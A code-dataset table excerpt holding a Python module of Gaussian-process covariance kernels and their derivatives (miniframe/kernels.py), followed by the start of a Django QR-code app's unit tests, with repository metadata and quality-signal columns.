hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f60a93633ec0cdca46c588929e221bac483a4f51 | 18,604 | py | Python | miniframe/kernels.py | jdavidrcamacho/mini-frame | a07b9ef83f57ae1a7178e73092297ca8b68a845e | [
"MIT"
] | 3 | 2018-12-11T20:53:42.000Z | 2021-11-04T16:23:34.000Z | miniframe/kernels.py | jdavidrcamacho/mini-frame | a07b9ef83f57ae1a7178e73092297ca8b68a845e | [
"MIT"
] | 6 | 2018-03-06T20:17:56.000Z | 2018-06-22T13:02:03.000Z | miniframe/kernels.py | jdavidrcamacho/mini-frame | a07b9ef83f57ae1a7178e73092297ca8b68a845e | [
"MIT"
] | 1 | 2018-03-06T20:13:55.000Z | 2018-03-06T20:13:55.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
pi = np.pi
class kernel(object):
""" Definition the base kernel class """
is_kernel = True
def __init__(self, *args):
""" Puts all kernel arguments in an array pars """
self.pars = np.array(args)
def __call__(self, r):
""" r = t - t' """
raise NotImplementedError
def __add__(self, b):
if not hasattr(b, "is_kernel"):
return Sum(Constant(c=float(b)), self)
return Sum(self, b)
def __radd__(self, b):
return self.__add__(b)
def __mul__(self, b):
if not hasattr(b, "is_kernel"):
return Product(Constant(c=float(b)), self)
return Product(self, b)
def __rmul__(self, b):
return self.__mul__(b)
def __repr__(self):
""" Representation of each kernel instance """
return "{0}({1})".format(self.__class__.__name__,
", ".join(map(str, self.pars)))
class _operator(kernel):
""" To allow operations between two kernels """
def __init__(self, k1, k2):
self.k1 = k1
self.k2 = k2
@property
def pars(self):
return np.append(self.k1.pars, self.k2.pars)
class Sum(_operator):
""" Sum of two kernels """
def __repr__(self):
return "{0} + {1}".format(self.k1, self.k2)
def __call__(self, r):
return self.k1(r) + self.k2(r)
class Product(_operator):
""" Product of two kernels """
def __repr__(self):
return "{0} * {1}".format(self.k1, self.k2)
def __call__(self, r):
return self.k1(r) * self.k2(r)
class Constant(kernel):
""" This kernel returns its constant argument c """
def __init__(self, c):
super(Constant, self).__init__(c)
self.c = c
def __call__(self, r):
return self.c * np.ones_like(r)
# Squared exponential kernel
class SquaredExponential(kernel):
"""
Squared Exponential kernel, also known as radial basis function
(RBF kernel) in other works.
Parameters:
ell: float
Length-scale, lambda in the paper
wn: float
White noise amplitude
"""
def __init__(self, ell, wn):
super(SquaredExponential, self).__init__(ell, wn)
self.ell = ell
self.wn = wn
def __call__(self, r):
try:
f1 = r**2
f2 = self.ell**2
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return np.exp(-0.5 *f1/f2) + fwn
except ValueError:
f1 = r**2
f2 = self.ell**2
return np.exp(-0.5 *f1/f2)
class dSE_dt1(SquaredExponential):
"""
Derivative of the SquaredExponential kernel in order to t1.
"""
def __init__(self, ell, wn):
super(dSE_dt1, self).__init__(ell, wn)
self.ell = ell
self.wn = wn
def __call__(self, r):
try:
f1 = r
f2 = self.ell**2
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return -f1/f2 *np.exp(-0.5*f1*f1/f2) + fwn
except ValueError:
f1 = r
f2 = self.ell**2
return -f1/f2 *np.exp(-0.5*f1*f1/f2)
class dSE_dt2(SquaredExponential):
"""
Derivative of the SquaredExponential kernel in order to t2.
"""
def __init__(self, ell, wn):
super(dSE_dt2, self).__init__(ell, wn)
self.ell = ell
self.wn = wn
def __call__(self, r):
try:
f1 = r
f2 = self.ell**2
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return f1/f2 *np.exp(-0.5*f1*f1/f2) + fwn
except ValueError:
f1 = r
f2 = self.ell**2
return f1/f2 *np.exp(-0.5*f1*f1/f2)
class ddSE_dt2dt1(SquaredExponential):
"""
Derivative of the SquaredExponential kernel, one time in order to t1 and
another in order to t2.
"""
def __init__(self, ell, wn):
super(ddSE_dt2dt1, self).__init__(ell, wn)
self.ell = ell
self.wn = wn
def __call__(self, r):
try:
f1 = r**2
f2 = self.ell**2
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return (1.0/f2 -f1/f2**2) *np.exp(-0.5*f1/f2) + fwn
except ValueError:
f1 = r**2
f2 = self.ell**2
return (1.0/f2 -f1/f2**2) *np.exp(-0.5*f1/f2)
class dddSE_dt2ddt1(SquaredExponential):
"""
Derivative of the SquaredExponential kernel, two times in order to t1 and
one in order to t2.
"""
def __init__(self, ell, wn):
super(dddSE_dt2ddt1, self).__init__(ell, wn)
self.ell = ell
self.wn = wn
def __call__(self, r):
try:
f1 = r
f11 = r**2
f111 = r**3
f2 = self.ell**2
f22 = self.ell**4
f222 = self.ell**6
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return (f111/f222 -3.0*f1/f22) *np.exp(-0.5*f11/f2) + fwn
except ValueError:
f1 = r
f11 = r**2
f111 = r**3
f2 = self.ell**2
f22 = self.ell**4
f222 = self.ell**6
return (f111/f222 -3.0*f1/f22) *np.exp(-0.5*f11/f2)
class dddSE_ddt2dt1(SquaredExponential):
"""
Derivative of the SquaredExponential kernel, one time in order to t1 and
two times in order to t2. Equation A6 in the paper, for N=1.
"""
def __init__(self, ell, wn):
super(dddSE_ddt2dt1, self).__init__(ell, wn)
self.ell = ell
self.wn = wn
def __call__(self, r):
try:
f1 = r
f11 = r**2
f111 = r**3
f2 = self.ell**2
f22 = self.ell**4
f222 = self.ell**6
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return (-f111/f222 +3.0*f1/f22) *np.exp(-0.5*f11/f2) + fwn
except ValueError:
f1 = r
f11 = r**2
f111 = r**3
f2 = self.ell**2
f22 = self.ell**4
f222 = self.ell**6
return (-f111/f222 +3.0*f1/f22) *np.exp(-0.5*f11/f2)
class ddddSE_ddt2ddt1(SquaredExponential):
"""
Derivative of the SquaredExponential kernel, two times in order to t1 and
two times in order to t2. Equation A6 in the paper, for N=1.
"""
def __init__(self, ell, wn):
super(ddddSE_ddt2ddt1, self).__init__(ell, wn)
self.ell = ell
self.wn = wn
def __call__(self, r):
try:
f1 = r**2
f11 = r**4
f2 = self.ell**2
f22 = self.ell**4
f222 = self.ell**6
f2222 = self.ell**8
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return (f11/f2222 -6.0*f1/f222 +3.0/f22) *np.exp(-0.5*f1/f2) + fwn
except ValueError:
f1 = r**2
f11 = r**4
f2 = self.ell**2
f22 = self.ell**4
f222 = self.ell**6
f2222 = self.ell**8
return (f11/f2222 -6.0*f1/f222 +3.0/f22) *np.exp(-0.5*f1/f2)
# Quasi-periodic kernel
class QuasiPeriodic(kernel):
"""
This kernel is the product between the exponential sine squared kernel and
the squared exponential kernel. It is known as the quasi-periodic kernel.
Equation 27 in the paper.
Parameters
----------
theta: float
Kernel amplitude
ell_e: float
Evolutionary time scale
ell_p: float
Length scale of the periodic component
Period: float
Kernel periodicity
wn: float
White noise amplitude
"""
def __init__(self, ell_e, ell_p, period, wn):
super(QuasiPeriodic, self).__init__(ell_e, ell_p, period, wn)
self.ell_e = ell_e
self.ell_p = ell_p
self.period = period
self.wn = wn
def __call__(self, r):
try:
f1 = r
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f5 = np.sin(pi*f1/f4)
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return np.exp( -(2.0*f5*f5/f2) -0.5*f1*f1/f3 ) + fwn
except ValueError:
f1 = r
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f5 = np.sin(pi*f1/f4)
return np.exp( -(2.0*f5*f5/f2) -0.5*f1*f1/f3)
class dQP_dt1(QuasiPeriodic):
"""
Derivative of the QuasiPeriodic kernel, in order to t1. Equation A8 in the
paper.
"""
def __init__(self, ell_e, ell_p, period, wn):
super(dQP_dt1, self).__init__(ell_e, ell_p, period, wn)
self.ell_e = ell_e
self.ell_p = ell_p
self.period = period
self.wn = wn
def __call__(self, r):
try:
f1 = r
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f5 = np.sin(pi*f1/f4)
f6 = np.cos(pi*f1/f4)
f7 = np.exp( - 2.0*f5*f5/f2 - 0.5*f1*f1/f3 )
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return (-(4*pi*f5*f6)/(f2*f4) -f1/f3) *f7 +fwn
except ValueError:
f1 = r
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f5 = np.sin(pi*f1/f4)
f6 = np.cos(pi*f1/f4)
f7 = np.exp( - 2.0*f5*f5/f2 - 0.5*f1*f1/f3 )
return (-(4*pi*f5*f6)/(f2*f4) -f1/f3) *f7
class dQP_dt2(QuasiPeriodic):
"""
Derivative of the QuasiPeriodic kernel, in order to t2. Equation A9 in the
paper.
"""
def __init__(self, ell_e, ell_p, period, wn):
super(dQP_dt2, self).__init__(ell_e, ell_p, period, wn)
self.ell_e = ell_e
self.ell_p = ell_p
self.period = period
self.wn = wn
def __call__(self, r):
try:
f1 = r
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f5 = np.sin(pi*f1/f4)
f6 = np.cos(pi*f1/f4)
f7 = np.exp( -(2.0*f5*f5/f2) - 0.5*f1*f1/f3 )
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return ((4*pi*f5*f6)/(f2*f4) +f1/f3) *f7 +fwn
except ValueError:
f1 = r
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f5 = np.sin(pi*f1/f4)
f6 = np.cos(pi*f1/f4)
f7 = np.exp( -(2.0*f5*f5/f2) - 0.5*f1*f1/f3 )
return ((4*pi*f5*f6)/(f2*f4) +f1/f3) *f7
class ddQP_dt2dt1(QuasiPeriodic):
"""
Derivative of the QuasiPeriodic kernel, one time in order to t1 and another
in order to t2. Equation A10 in the paper.
"""
def __init__(self, ell_e, ell_p, period, wn):
super(ddQP_dt2dt1, self).__init__(ell_e, ell_p, period, wn)
self.ell_e = ell_e
self.ell_p = ell_p
self.period = period
self.wn = wn
def __call__(self, r):
try:
f1 = r
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f5 = np.sin(pi*f1/f4)
f6 = np.cos(pi*f1/f4)
f7 = np.exp( -(2.0*f5*f5/f2) - 0.5*f1*f1/f3 )
f8 = (-(4*pi*f5*f6)/(f2*f4) - f1/f3)
f9 = ((4*pi*f5*f6)/(f2*f4) + f1/f3)
fwn=self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return (f8*f9 +1.0/f3 +4*pi*pi*f6*f6/(f2*f4*f4) \
-4*pi*pi*f5*f5/(f2*f4*f4)) *f7 +fwn
except ValueError:
f1 = r
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f5 = np.sin(pi*f1/f4)
f6 = np.cos(pi*f1/f4)
f7 = np.exp( -(2.0*f5*f5/f2) - 0.5*f1*f1/f3 )
f8 = (-(4*pi*f5*f6)/(f2*f4) - f1/f3)
f9 = ((4*pi*f5*f6)/(f2*f4) + f1/f3)
return (f8*f9 +1.0/f3 +4*pi*pi*f6*f6/(f2*f4*f4) \
-4*pi*pi*f5*f5/(f2*f4*f4)) *f7
class dddQP_dt2ddt1(QuasiPeriodic):
"""
Derivative of the QuasiPeriodic kernel, two times in order to t1t1 and one
time in order t2. Equation A10 in the paper.
"""
def __init__(self, ell_e, ell_p, period, wn):
super(dddQP_dt2ddt1, self).__init__(ell_e, ell_p, period, wn)
self.ell_e = ell_e
self.ell_p = ell_p
self.period = period
self.wn = wn
def __call__(self, r):
try:
f1 = r
f11 = r**2
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f44 = self.period**2
f444 = self.period**3
f5 = np.sin(pi*f1/f4)
f55 = np.sin(pi*f1/f4)**2
f6 = np.cos(pi*f1/f4)
f66 = np.cos(pi*f1/f4)**2
f7 = np.exp( -(2.0*f55/f2) - 0.5*f11/f3 )
j1 = -1/f3 -4*pi*pi*f66/(f2*f44) +4*pi*pi*f55/(f2*f44)
j2 = f1/f3 + 4*pi*f5*f5/(f2*f4)
j3 = (-j2)**2
j4 = j2
j5 = -j1
j6 = -j2
j8 = 16*pi*pi*pi*f6*f5/(f2*f444)
fwn=self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return (j1*j2 + j3*j4 + 2*j5*j6 - j8) *f7 +fwn
except ValueError:
f1 = r
f11 = r**2
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f44 = self.period**2
f444 = self.period**3
f5 = np.sin(pi*f1/f4)
f55 = np.sin(pi*f1/f4)**2
f6 = np.cos(pi*f1/f4)
f66 = np.cos(pi*f1/f4)**2
f7 = np.exp( -(2.0*f55/f2) - 0.5*f11/f3 )
j1 = -1/f3 -4*pi*pi*f66/(f2*f44) +4*pi*pi*f55/(f2*f44)
j2 = f1/f3 + 4*pi*f5*f5/(f2*f4)
j3 = (-j2)**2
j4 = j2
j5 = -j1
j6 = -j2
j8 = 16*pi*pi*pi*f6*f5/(f2*f444)
return (j1*j2 + j3*j4 + 2*j5*j6 - j8) *f7
class dddQP_ddt2dt1(QuasiPeriodic):
"""
Second derivative of the QuasiPeriodic kernel, one time in order to t1t1
and two times in order t2. Equation A10 in the paper.
"""
def __init__(self, ell_e, ell_p, period, wn):
super(dddQP_ddt2dt1, self).__init__(ell_e, ell_p, period, wn)
self.ell_p = ell_p
self.ell_e = ell_e
self.period = period
self.wn = wn
def __call__(self, r):
try:
f1 = r
f11 = r**2
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f44 = self.period**2
f444 = self.period**3
f5 = np.sin(pi*f1/f4)
f55 = np.sin(pi*f1/f4)**2
f6 = np.cos(pi*f1/f4)
f66 = np.cos(pi*f1/f4)**2
f7 = np.exp( -(2.0*f55/f2) - 0.5*f11/f3 )
j1 = -1/f3 -4*pi*pi*f66/(f2*f44) +4*pi*pi*f55/(f2*f44)
j2 = f1/f3 + 4*pi*f5*f5/(f2*f4)
j3 = (-j2)**2
j4 = j2
j5 = -j1
j6 = -j2
j8 = 16*pi*pi*pi*f6*f5/(f2*f444)
fwn=self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return -(j1*j2 + j3*j4 + 2*j5*j6 - j8) *f7 +fwn
except ValueError:
f1 = r
f11 = r**2
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f44 = self.period**2
f444 = self.period**3
f5 = np.sin(pi*f1/f4)
f55 = np.sin(pi*f1/f4)**2
f6 = np.cos(pi*f1/f4)
f66 = np.cos(pi*f1/f4)**2
f7 = np.exp( -(2.0*f55/f2) - 0.5*f11/f3 )
j1 = -1/f3 -4*pi*pi*f66/(f2*f44) +4*pi*pi*f55/(f2*f44)
j2 = f1/f3 + 4*pi*f5*f5/(f2*f4)
j3 = (-j2)**2
j4 = j2
j5 = -j1
j6 = -j2
j8 = 16*pi*pi*pi*f6*f5/(f2*f444)
return -(j1*j2 + j3*j4 + 2*j5*j6 - j8) *f7
class ddddQP_ddt2ddt1(QuasiPeriodic):
"""
Second derivative of the QuasiPeriodic kernel, two times in order to t1
and two times in order to t2. Equation A6 in the paper, for N=1.
"""
def __init__(self, ell_e, ell_p, period, wn):
super(ddddQP_ddt2ddt1, self).__init__(ell_e, ell_p, period, wn)
self.ell_p = ell_p
self.ell_e = ell_e
self.period = period
self.wn = wn
def __call__(self, r):
try:
f1 = r
f11 = r**2
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f44 = self.period**2
f444 = self.period**3
f4444 = self.period**4
f5 = np.sin(pi*f1/f4)
f55 = np.sin(pi*f1/f4)**2
f6 = np.cos(pi*f1/f4)
f66 = np.cos(pi*f1/f4)**2
f7 = np.exp( -0.5*f11/f3 - 2*f55/f2)
j1 = 1./f3 + 4*pi*pi*f66/(f2*f44) - 4*pi*pi*f55/(f2*f44)
j2 = -f1/f3 - 4*pi*f6*f5/(f2*f4)
j3 = f1/f3 + 4*pi*f6*f5/(f2*f4)
j4 = 32*pi*pi*pi*f6*f5*j3/(f2*f444)
j5 = 32*pi*pi*pi*f6*f5*j2/(f2*f444)
j6 = 16*pi*pi*pi*pi*f55/(f2*f4444)
j7 = 16*pi*pi*pi*pi*f66/(f2*f4444)
j8 = -j1
j9 = j3**2
j10 = j2**2
j11 = (-j1)**2
fwn=self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return (4*j1*j2*j3 -j4 +j5 -j6 +j7 +j8*j9 \
+j10*j9 +j8*j10 +j11 +2*j1**2) *f7 +fwn
except ValueError:
f1 = r
f11 = r**2
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f44 = self.period**2
f444 = self.period**3
f4444 = self.period**4
f5 = np.sin(pi*f1/f4)
f55 = np.sin(pi*f1/f4)**2
f6 = np.cos(pi*f1/f4)
f66 = np.cos(pi*f1/f4)**2
f7 = np.exp( -0.5*f11/f3 - 2*f55/f2)
j1 = 1./f3 + 4*pi*pi*f66/(f2*f44) - 4*pi*pi*f55/(f2*f44)
j2 = -f1/f3 - 4*pi*f6*f5/(f2*f4)
j3 = f1/f3 + 4*pi*f6*f5/(f2*f4)
j4 = 32*pi*pi*pi*f6*f5*j3/(f2*f444)
j5 = 32*pi*pi*pi*f6*f5*j2/(f2*f444)
j6 = 16*pi*pi*pi*pi*f55/(f2*f4444)
j7 = 16*pi*pi*pi*pi*f66/(f2*f4444)
j8 = -j1
j9 = j3**2
j10 = j2**2
j11 = (-j1)**2
return (4*j1*j2*j3 -j4 +j5 -j6 +j7 +j8*j9 \
+j10*j9 +j8*j10 +j11 +2*j1**2) *f7
| 30.054927 | 83 | 0.480596 | 2,847 | 18,604 | 3.008781 | 0.067088 | 0.074364 | 0.026617 | 0.021013 | 0.833761 | 0.827457 | 0.8152 | 0.803993 | 0.803993 | 0.761382 | 0 | 0.116901 | 0.372823 | 18,604 | 618 | 84 | 30.10356 | 0.617244 | 0.118147 | 0 | 0.793333 | 0 | 0 | 0.002872 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095556 | false | 0 | 0.002222 | 0.017778 | 0.233333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f6596a4dd489e707722a249e6e4933745bd6c60e | 165,429 | py | Python | qr_code/tests/tests.py | HackRoboy/CoinBoy | 5e10e763fe2e1e492f733fdf2531c77f13cef3a4 | [
"BSD-3-Clause"
] | null | null | null | qr_code/tests/tests.py | HackRoboy/CoinBoy | 5e10e763fe2e1e492f733fdf2531c77f13cef3a4 | [
"BSD-3-Clause"
] | null | null | null | qr_code/tests/tests.py | HackRoboy/CoinBoy | 5e10e763fe2e1e492f733fdf2531c77f13cef3a4 | [
"BSD-3-Clause"
] | null | null | null | """Tests for qr_code application."""
import base64
import re
import os
from datetime import date
from django.template import Template, Context
from django.test import SimpleTestCase, override_settings
from django.utils.safestring import mark_safe
from django.utils.html import escape
from qr_code.qrcode.image import SVG_FORMAT_NAME, PNG_FORMAT_NAME
from qr_code.qrcode.maker import make_embedded_qr_code
from qr_code.qrcode.constants import ERROR_CORRECTION_DICT, DEFAULT_IMAGE_FORMAT, DEFAULT_MODULE_SIZE, \
DEFAULT_ERROR_CORRECTION, DEFAULT_VERSION
from qr_code.qrcode.serve import make_qr_code_url
from qr_code.qrcode.utils import ContactDetail, WifiConfig, QRCodeOptions, Coordinates
from qr_code.templatetags.qr_code import qr_from_text, qr_url_from_text
BASE64_PNG_IMAGE_TEMPLATE = '<img src="data:image/png;base64, %salt="Hello World!">'
TEST_TEXT = 'Hello World!'
COMPLEX_TEST_TEXT = '/%+¼@#=<>àé'
TEST_CONTACT_DETAIL = dict(
first_name='John',
last_name='Doe',
first_name_reading='jAAn',
last_name_reading='dOH',
tel='+41769998877',
email='j.doe@company.com',
url='http://www.company.com',
birthday=date(year=1985, month=10, day=2),
address='Cras des Fourches 987, 2800 Delémont, Jura, Switzerland',
memo='Development Manager',
org='Company Ltd',
)
TEST_WIFI_CONFIG = dict(
ssid='my-wifi',
authentication=WifiConfig.AUTHENTICATION.WPA,
password='wifi-password'
)
OVERRIDE_CACHES_SETTING = {'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', },
'qr-code': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'qr-code-cache', 'TIMEOUT': 3600}}
SVG_REF_SUFFIX = '.ref.svg'
PNG_REF_SUFFIX = '.ref.png'
def get_resources_path():
tests_dir = os.path.dirname(os.path.abspath(__file__))
resources_dir = os.path.join(tests_dir, 'resources')
return resources_dir
def _make_closing_path_tag(svg):
return svg.replace(' /></svg>', '></path></svg>')
class TestApps(SimpleTestCase):
def test_apps_attributes(self):
from qr_code.apps import QrCodeConfig
self.assertEqual(QrCodeConfig.name, 'qr_code')
self.assertEqual(QrCodeConfig.verbose_name, 'Django QR code')
class TestQRCodeOptions(SimpleTestCase):
def test_qr_code_options(self):
with self.assertRaises(ValueError):
QRCodeOptions(foo='bar')
options = QRCodeOptions()
self.assertEqual(options.border, 4)
self.assertEqual(options.size, DEFAULT_MODULE_SIZE)
self.assertEqual(options.image_format, DEFAULT_IMAGE_FORMAT)
self.assertEqual(options.version, DEFAULT_VERSION)
self.assertEqual(options.error_correction, DEFAULT_ERROR_CORRECTION)
options = QRCodeOptions(image_format='invalid-image-format')
self.assertEqual(options.image_format, DEFAULT_IMAGE_FORMAT)
class TestContactDetail(SimpleTestCase):
def test_make_qr_code_text(self):
data = dict(**TEST_CONTACT_DETAIL)
c1 = ContactDetail(**data)
data['nickname'] = 'buddy'
c2 = ContactDetail(**data)
data['last_name'] = "O'Hara;,:"
data['tel_av'] = 'n/a'
c3 = ContactDetail(**data)
del data['last_name']
c4 = ContactDetail(**data)
self.assertEqual(c1.make_qr_code_text(), r'MECARD:N:Doe,John;SOUND:dOH,jAAn;TEL:+41769998877;EMAIL:j.doe@company.com;NOTE:Development Manager;BDAY:19851002;ADR:Cras des Fourches 987, 2800 Delémont, Jura, Switzerland;URL:http\://www.company.com;ORG:Company Ltd;;')
self.assertEqual(c2.make_qr_code_text(), r'MECARD:N:Doe,John;SOUND:dOH,jAAn;TEL:+41769998877;EMAIL:j.doe@company.com;NOTE:Development Manager;BDAY:19851002;ADR:Cras des Fourches 987, 2800 Delémont, Jura, Switzerland;URL:http\://www.company.com;NICKNAME:buddy;ORG:Company Ltd;;')
self.assertEqual(c3.make_qr_code_text(),
r"MECARD:N:O'Hara\;\,\:,John;SOUND:dOH,jAAn;TEL:+41769998877;TEL-AV:n/a;EMAIL:j.doe@company.com;NOTE:Development Manager;BDAY:19851002;ADR:Cras des Fourches 987, 2800 Delémont, Jura, Switzerland;URL:http\://www.company.com;NICKNAME:buddy;ORG:Company Ltd;;")
self.assertEqual(c4.make_qr_code_text(),
r"MECARD:N:John;SOUND:dOH,jAAn;TEL:+41769998877;TEL-AV:n/a;EMAIL:j.doe@company.com;NOTE:Development Manager;BDAY:19851002;ADR:Cras des Fourches 987, 2800 Delémont, Jura, Switzerland;URL:http\://www.company.com;NICKNAME:buddy;ORG:Company Ltd;;")
class TestWifiConfig(SimpleTestCase):
def test_make_qr_code_text(self):
wifi1 = WifiConfig(**TEST_WIFI_CONFIG)
wifi2 = WifiConfig(hidden=True, **TEST_WIFI_CONFIG)
self.assertEqual(wifi1.make_qr_code_text(), 'WIFI:S:my-wifi;T:WPA;P:wifi-password;;')
self.assertEqual(wifi2.make_qr_code_text(), 'WIFI:S:my-wifi;T:WPA;P:wifi-password;H:true;;')
class TestCoordinates(SimpleTestCase):
def test_coordinates(self):
c1 = Coordinates(latitude=586000.32, longitude=250954.19)
c2 = Coordinates(latitude=586000.32, longitude=250954.19, altitude=500)
self.assertEqual(c1.__str__(), 'latitude: 586000.32, longitude: 250954.19')
self.assertEqual(c2.__str__(), 'latitude: 586000.32, longitude: 250954.19, altitude: 500')
@override_settings()
class TestQRUrlFromTextResult(SimpleTestCase):
"""
Ensures that serving images representing QR codes works as expected (with or without caching, and with or without
protection against external requests).
"""
